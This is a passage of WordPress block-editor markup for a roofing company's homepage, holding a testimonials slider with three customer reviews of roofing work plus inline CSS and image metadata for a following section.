{\"block_id\":\"7fb2dcec-224f-4765-8762-daef2cd5aa1c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7fb2dcec-224f-4765-8762-daef2cd5aa1c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. \",\"name\":\"RIck \\u0026amp; Peggy \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..\",\"name\":\"Mike\",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"be53c5bc\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-be53c5bc\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-be53c5bc\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. </div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">RIck &amp; Peggy </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">Mike</span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4c086610-bd57-4da0-863d-9e60a966c85a\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-4c086610-bd57-4da0-863d-9e60a966c85a background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"6b0e2ffd-e3fd-4707-bd8d-df424a1d4029\"} -->\n<style type=\"text/css\"> .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"bb519bbf-75d4-4620-a3da-12a30296f3eb\"} -->\n<style type=\"text/css\"> .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-bb519bbf-75d4-4620-a3da-12a30296f3eb\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n 